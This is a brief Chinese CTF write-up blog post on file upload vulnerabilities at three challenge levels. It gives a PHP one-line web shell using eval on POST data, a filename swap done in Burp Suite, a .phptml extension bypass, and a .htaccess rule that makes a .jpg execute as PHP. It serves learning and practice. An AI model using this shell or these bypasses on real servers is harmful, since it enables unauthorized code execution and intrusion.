UpLoad漏洞 WP

CTF-UpLoad

文件上传漏洞总结

1.0版本

​ 创建新的php文件,文件内容写入一句话木马:这里我的文件名用test.php

1
<?php eval($_POST['ctf']); ?>

​ 修改文件后缀名为.jpg,绕过前端文件类型检测,上传。再用BurpSuite拦截发往服务器的请求,将请求内容中filename=”test.jpg”改为filename=”test.php”,转发后即可上传。

​ 用中国蚁剑链接,填入url/upload/test.php,密码为ctf,即可入侵后台拿到flag。

2.0版本

​ 2.0版本新增了后端php文件类型检测,因此需将文件后缀名改为.phptml后重复1.0版本即可。

3.0版本

 3.0版本新增后端php、phptml等等可用于php语言解析的文件后缀名检测,因此,需使用用于Apache Web服务器配置相关指令的.htaccess文件进行绕过。.htaccess文件中写入:
1
2
3
<FilesMatch "test.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

可以在服务器端自动将test.jpg文件按照php文件来解析,达到绕过目的,最终拿到Flag。


UpLoad漏洞 WP
http://yaesakuraq.github.io/2025/02/23/CTF-UpLoad漏洞/
作者
SakuraQ
发布于
2025年2月23日
许可协议